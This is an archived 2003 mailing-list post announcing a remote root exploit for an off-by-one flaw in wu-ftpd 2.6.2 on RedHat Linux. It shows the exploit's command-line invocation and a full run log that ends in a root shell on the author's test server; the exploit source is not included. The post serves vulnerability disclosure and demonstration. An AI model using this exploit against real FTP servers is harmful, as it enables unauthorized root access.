wu-ftpd-2.6.2 off-by-one remote exploit.

From: dong-h0un U (xploitat_private)
Date: Sun Aug 03 2003 - 23:29:43 PDT


    I succeeded on RedHat Linux (x86) with wu-2.6.2(1), 2.6.2(2), 2.6.1, 2.6.0 (most versions).
    This is not a fake.
    
    An excellent advisory was already announced (2003/07/31):
    http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
    
    This information was very useful to me.
    I'm thankful to them.
    
    This works well on my server.
    What if it doesn't work on your server?
    
    There are various reasons why it may not work on other servers.
    (For example, compiler version, operating system type,
    a mistake in the shellcode's position, environment variables, etc.)
    
    I don't think about those. Exert your force. :-)
    INetCop Security is poor now. They have a few servers.
    
    
    * Exploit result:
    
    
    --
    bash$ cat /etc/redhat-release
    Red Hat Linux release 6.1 (Cartman)
    bash$ gcc -v
    Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
    gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
    --
    
    bash$ ./0x82-wu262 -htest.inetcop.org -ux82 -pmy_pass -n21 -t2
    
     0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.
    
     [*] Target: RedHat Linux 6.x Version wu-2.6.2(2) compile.
     [+] address: 0x806aaf0.
     [*] #1 Try, test.inetcop.org:21 ... [  OK  ]
     [1] ftpd connection login.
     [*] ftpd connection success.
     [+] User id input.
     [+] User password input.
     [*] User x82 logged in.
     [2] send exploit code.
     [+] 01: make 0x41414141 directory.
     [+] 02: make shell-code directory.
     [+] 03: make 0x43434343 directory.
     [+] 04: make 0x44444444 directory.
     [+] 05: make 0x45454545 directory.
     [+] 06: make 0x46464646 directory.
     [+] 07: make 0x47474747 directory.
     [+] 08: make 0x48484848 directory.
     [+] 09: make 0x49494949 directory.
     [+] 10: make 0x50505050 directory.
     [+] 11: make 0x51515151 directory.
     [+] 12: make 0x52525252 directory.
     [+] 13: make 0x53535353 directory.
     [+] 14: make 0x54545454 directory.
     [+] 15: make 0x55555555 directory.
     [+] Ok, MKD &shellcode_dir.
     [+] #2 Try, test.inetcop.org:21 ... [  OK  ]
     [3] ftpd connection login.
     [*] ftpd connection success.
     [+] User id input.
     [+] User password input.
     [*] User x82 logged in.
     [4] send exploit code.
     [+] 01: make 0x41414141 directory.
     [+] 02: make shell-code directory.
     [+] 03: make 0x43434343 directory.
     [+] 04: make 0x44444444 directory.
     [+] 05: make 0x45454545 directory.
     [+] 06: make 0x46464646 directory.
     [+] 07: make 0x47474747 directory.
     [+] 08: make 0x48484848 directory.
     [+] 09: make 0x49494949 directory.
     [+] 10: make 0x50505050 directory.
     [+] 11: make 0x51515151 directory.
     [+] 12: make 0x52525252 directory.
     [+] 13: make 0x53535353 directory.
     [+] 14: make 0x54545454 directory.
     [+] 15: make 0x55555555 directory.
     [+] Ok, RMD &shellcode_dir.
     [5] Waiting, execute the shell ...
     [*] Send, command packet !
    
    x82 is happy, x82 is happy, x82 is happy
    Linux test.inetcop.org 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
    uid=0(root) gid=0(root) egid=501(x82) groups=501(x82),500(secure)
    bash#
    
    --
    
    P.S.: Please don't mail me questions about the exploit.
          Sorry for my poor English.
    
    
    This archive was generated by hypermail 2b30 : Mon Aug 04 2003 - 11:50:18 PDT